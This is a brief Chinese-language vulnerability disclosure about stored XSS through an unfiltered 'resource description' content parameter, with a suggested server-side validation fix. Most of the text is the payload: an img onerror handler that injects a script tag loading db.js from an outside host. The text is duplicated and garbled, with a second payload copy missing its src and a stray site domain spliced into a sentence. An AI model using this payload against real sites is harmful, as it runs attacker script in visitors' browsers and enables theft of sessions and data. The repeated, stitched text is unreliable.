在“资源描述”的地方对提交的content参数过滤不严,导致XSS。
漏洞代码:
<img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0);
var b = document.createElement('script');
b.type = 'text/javascript';
b.src=' www.2cto.com /db.js';
a.appendChild(b);">
只测试了IE和GOOGLE浏览器,其他未测试。
过滤不严,导致XSS。
漏洞代码:
<img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0);
var b = document.createElement('script');
b.type = 'text/javascript';
b.src='';
a.appendChild(b);">
只测试了IE和GOOGLE浏览器,www.xuhantao.com,其他未测试。
修复方案:
服务端也验证